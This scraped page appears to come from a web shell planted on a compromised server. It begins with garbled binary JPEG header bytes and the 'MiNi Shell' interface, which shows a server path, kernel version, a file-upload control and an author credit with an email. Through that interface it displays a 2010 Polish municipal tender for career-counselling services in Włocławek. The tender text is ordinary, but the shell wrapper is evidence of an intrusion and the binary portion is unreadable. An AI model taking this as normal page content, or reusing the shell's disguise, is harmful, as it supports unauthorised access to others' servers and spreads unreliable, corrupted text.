JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/130230-N-2010.html

<p class="kh_header"><b>Włocławek: Usługi doradztwa zawodowego realizowane w ramach projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek</b><br>
<b>Numer ogłoszenia: 130230 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Kościuszki 26, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4116399, faks 054 4116399.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mopr.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradztwa zawodowego realizowane w ramach projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi doradztwa zawodowego dla osób niepracujących, korzystających ze świadczeń pomocy społecznej zagrożonych wykluczeniem społecznym oraz wychowanków placówek opiekuńczo-wychowawczych i rodzin zastępczych w ramach projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013 Priorytet VII Promocja Aktywnej Integracji; Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2. Przedmiot zamówienia obejmuje usługi doradztwa prowadzone w formie zajęć indywidualnych oraz zajęć grupowych, w zakresie poradnictwa zawodowego, których efektem powinno być sformułowanie dla każdego uczestnika grup wsparcia Indywidualnego Planu Działania (IPD), w następujących częściach:
2a. CZĘŚĆ I - prowadzenie grupowego wparcia psychologicznego obejmującego łącznie 23 godziny warsztatów dla uczestników Programów Aktywności Lokalnej (PAL). Termin realizacji programu: miesiące czerwiec-październik 2010 rok; 
Warsztaty grupowe w ramach poszczególnych PAL, odbywać się muszą następująco:
PAL Nr 1 - 4 godziny warsztatów w terminie maj-czerwiec 2010 r. - 20 osób;
PAL Nr 2 - 4 godziny warsztatów w terminie lipiec-wrzesień 2010 r. - 10 osób;
PAL Nr 3A - 2 godziny warsztatów w terminie październik 2010 r. - 10 osób;
PAL Nr 3B - 2 godziny warsztatów w terminie maj 2010 r. - 10 osób;
PAL Nr 4 - 3 godziny warsztatów w terminie lipiec 2010 r. - 15 osób;
PAL Nr 5 - 4 godziny warsztatów w terminie maj-czerwiec 2010 r. - 10 osób;
PAL Nr 8 - 4 godziny warsztatów w terminie lipiec 2010 r. - 15 osób.
2b. CZĘŚĆ II - prowadzenie indywidualnego i grupowego poradnictwa zawodowego, obejmującego łącznie 96 godzin, w tym: 36 godzin zajęć grupowych oraz 60 godzin zajęć indywidualnych (2 godz. x 30 osób); dla uczestników KIS, liczącego 30 osób. Termin realizacji programu: miesiąc lipiec-wrzesień 2010;
2c. CZĘŚĆ III - prowadzenie indywidualnego i grupowego poradnictwa zawodowego, obejmującego łącznie 96 godzin, w tym: 36 godzin zajęć grupowych oraz 60 godzin zajęć indywidualnych (2 godz. x 30 osób); dla uczestników KIS, liczącego 30 osób. Termin realizacji programu: miesiąc lipiec-wrzesień 2010;
2d. CZĘŚĆ IV - prowadzenie indywidualnego i grupowego poradnictwa zawodowego, obejmującego łącznie 28 godzin, w tym: 8 godzin zajęć grupowych (4 godz. x 2 grupy po 10 osób) oraz 20 godzin zajęć indywidualnych (2 godz. x 10 osób); dla usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych, liczących 10 osób. Termin realizacji programu: miesiąc czerwiec 2010.
3. Każda z opisanych w pkt 1 części stanowi odrębną część zamówienia.
4. Miejsce prowadzenia zajęć:
4a. zajęcia indywidualne i grupowe, wynikające z CZĘŚCI I i CZĘŚCI IV przedmiotu zamówienia prowadzone mają być w miejscu wskazanym przez Zamawiającego, zlokalizowanym na terenie miasta Włocławek;
4b. zajęcia indywidualne i grupowe, wynikające z CZĘŚCI II i III przedmiotu zamówienia odbywać się będą w siedzibie Klubu Integracji Społecznej we Włocławku, przy ul. Okrzei 61;
5. Usługi doradztwa zawodowego - indywidualne, składające się na wybrane części przedmiotu zamówienia polegać muszą na prowadzonych indywidualnie, zgodnie z wymogami czasowymi - zależnie od części przedmiotu zamówienia - rozmowach i  pomocy w konstruowaniu IDP osobom zakwalifikowanym do projektu, zgodnie z listami dostarczonymi każdorazowo przez Zamawiającego na 7 dni przed rozpoczęciem zajęć. 
6. Usługi doradztwa grupowe, składające się na wybrane części przedmiotu zamówienia -zgodnie z wskazaniami w pkt. 2 - polegać muszą na zorganizowaniu i przeprowadzeniu warsztatów grupowych dla określonych ilościowo - zależnie od części przedmiotu zamówienia - grup, zgodnie z wymogami czasowymi wyznaczonymi poszczególnymi częściami przedmiotu zamówienia. Listy uczestników zajęć grupowych Zamawiający dostarczy każdorazowo na 7 dni przed rozpoczęciem zajęć.
7. Program warsztatów indywidualnych i grupowych obejmować musi usługi doradztwa w zakresie kształtowania poruszania się po rynku pracy określone Załączniku Nr 1 do SIWZ. 
8. Program poradnictwa indywidualnego i warsztatów grupowych obejmować musi usługi doradztwa zawodowego dostosowane do odbiorców wyznaczonych poszczególnymi częściami przedmiotu zamówienia, które stanowią:
8a. osoby niepracujące, korzystające ze świadczeń pomocy społecznej - CZĘŚĆ I i II;
8b. osoby niepracujące z problemem alkoholowym, korzystające ze świadczeń pomocy społecznej - CZĘŚĆ III;
8c. wychowankowie rodzin zastępczych i placówek opiekuńczo-wychowawczych realizujących indywidualny program usamodzielnienia - CZĘŚĆ IV;
9. Warsztaty grupowe określone w poszczególnych częściach przedmiotu zamówienia odbywać się będą w następujących zespołach:
9a. CZĘŚĆ I
PAL 1 - 20 osób - 1 grupa;
PAL 2 - 10 osób - 1 grupa
PAL 3A - 10 osób - 1 grupa
PAL 3B - 10 osób - 1 grupa
PAL 4 - 15 osób - 1 grupa
PAL 5 - 10 osób - 1 grupa
PAL 8 - 15 osób - 1 grupa
9b. CZEŚĆ II i CZĘŚĆ III - 3 grupy po 10 osób;
9c. CZĘŚĆ IV - 2 grupy po 10 osób;
10. Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej na czas świadczenia usług doradztwa zawodowego.
11. Usługi doradztwa zawodowego muszą być realizowane przez osobę posiadającą następujące kwalifikacje:
11a. ukończone studia w szkole wyższej, zakończone uzyskaniem dyplomu z tytułem magistra. Preferowane wykształcenie wyższe kierunkowe: doradztwo zawodowe. W  przypadku ukończenia studiów na kierunkach: psychologia, socjologia, pedagogika niezbędne posiadanie ukończonych studiów podyplomowych z zakresu doradztwa zawodowego.
11b. licencja min. 1 stopnia doradcy zawodowego - w przypadku składania oferty na CZĘŚĆ II i III przedmiotu zamówienia wymagana;
11c. minimum 3 letni staż pracy w zawodzie doradcy;
11d. posiadanie pełnej zdolności do czynności prawnych oraz korzystania z pełni praw publicznych;
11e. niekaralność;
11f. doświadczenie w pracy z osobami niepracującymi, zagrożonymi wykluczeniem społecznym w przypadku wszystkich części przedmiotu zamówienia, dodatkowo: w przypadku CZĘŚCI IV - doświadczenie w pracy w wychowankami placówek opiekuńczo - wychowawczych i rodzin zastępczych, w przypadku CZĘŚCI III - doświadczenie w pracy z osobami z problemem alkoholowym;
11g. wiedzę z zakresu usług rynku pracy;
11h. doświadczenie Wykonawcy stanowi podstawę oceny ofert w kryterium doświadczenie, ocenianego indywidualnie przez członków komisji przetargowej, którzy dokonają tego na podstawie spełniania warunku określonego w pkt. 11f i 11g. Doświadczenie w zakresie realizacji zadań tożsamych - w przedmiocie dotyczącym wybranej części przedmiotu zamówienia - współfinansowanych ze środków Unii Europejskiej nie jest wymagane, ale w przypadku posiadania korzystnie wpłynie na ocenę w przedmiotowym kryterium.
12. Każdy Wykonawca zobowiązany jest prowadzić dokumentację z przebiegu usług, w zakresie swojej odpowiedzialności za właściwą realizację przedmiotu zlecenia w określonej - wybranej przez siebie - części niniejszego postępowania. Wykonawca zobowiązany będzie wypełniać w zależności od rodzaju usług następujące dokumenty:
12a. Arkusz indywidualnych spotkań z Doradcą Zawodowym - wzór druku stanowi załącznik Nr 2 do SIWZ;
12b. Lista obecności uczestnika realizującego Indywidualny Plan Działania z Doradcą zawodowym- wzór druku stanowi załącznik Nr 3 do SIWZ;
12c. Arkusz grupowego spotkania z Doradcą zawodowym - wzór druku stanowi załącznik Nr 4 do SIWZ;
12d. Lista obecności osób biorących udział w grupowym spotkaniu z Doradcą zawodowym - wzór druku stanowi załącznik Nr 5 do niniejszej SIWZ.
13. Wykonawca rozliczał się będzie z Zamawiającym z wykonanych usług miesięcznie - niezależnie od ilości prowadzonych zajęć w okresie od dnia pierwszego do dnia 30-31 danego miesiąca kalendarzowego. Rozliczenie dokonywane będzie na druku pn. Miesięczna karta czasu pracy - wzór druku stanowi załącznik nr 6 do SIWZ. Miesięczna karta będzie podstawą do wypłaty wynagrodzenia - zgodnie z zawartą umową zlecenie w przypadku osób fizycznych, bądź na podstawie faktury w przypadku przedsiębiorców.
14. Wymagania określone w rozdziale II SIWZ dotyczą wszystkich części zamówienia, zgodnie z wskazaniami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie niniejszego warunku przez Wykonawcę w zakresie usług doradztwa zawodowego potwierdza:
1a. posiadanie kwalifikacji, o których mowa w rozdz. II SIWZ - pkt 11a i 11b; 
1b. posiadanie pełnej zdolności do wykonywania czynności prawnych i korzystania z pełni praw publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wiedzą i doświadczeniem w wykonaniu w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie, ciągłości świadczenia usług doradztwa zawodowego, zgodnie z wymogami określonymi w rozdz. II SIWZ - pkt 11f, 11g, 11h. 
W przypadku składania oferty przez podmioty występujące wspólnie, niniejszy warunek musi spełniać, co najmniej jeden podmiot.
Wykonawca zobowiązany jest dołączyć dokumenty (np. referencje), potwierdzające realizację usług doradztwa zawodowego z uwzględnieniem ww. wymogów oraz, że przedmiotowe usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż podczas realizacji zamówienia będzie dysponował:
3a. narzędziami niezbędnymi do świadczenia usług doradztwa zawodowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zapewnić potencjał kadrowy niezbędny do realizacji usług doradztwa zawodowego w oferowanych częściach w osobach:
4a. doradca zawodowy z licencją min. 1 stopnia - dot. CZĘŚĆ II i III przedmiotu zamówienia,
4b. potwierdzeniem spełniania warunku jest dysponowanie osobami zdolnymi do wykonania oferowanej części przedmiotu zamówienia - zgodnie z wymaganiami określonymi w  rozdz. 2 pkt. 11 oraz sporządzenie przez wykonawcę wykazu kadry, uwzględniającego wymogi zamawiającego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku wykonawca potwierdza poprzez posiadanie opłaconej i ważnej polisy od odpowiedzialności cywilnej, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1a. zakres programowy usług doradztwa zawodowego z uwzględnieniem wymogów poszczególnych części przedmiotu zamówienia;
2a. list motywacyjny;
2b. życiorys w formie CV;
2c. kopia dowodu tożsamości;
2d. dokumenty potwierdzające posiadane kwalifikacje, niezbędne do realizacji przedmiotu zamówienia;
2e. oświadczenie o posiadaniu pełnej zdolności do wykonywania czynności prawnych i  korzystania z pełni praw publicznych;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty (załączony wzór druku).
2. Kalkulacja ceny ofertowej.
3. Zgoda na przetwarzanie danych osobowych.
4. Upoważnienie do podpisania oferty (fakultatywnie, jeżeli nie wynika ono z odrębnych dokumentów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mopr.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie, 
ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2010 godzina 12:30, miejsce: Miejski Ośrodek Pomocy Rodzinie, 
ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane w ramach projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013 Priorytet VII Promocja Aktywnej Integracji; Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com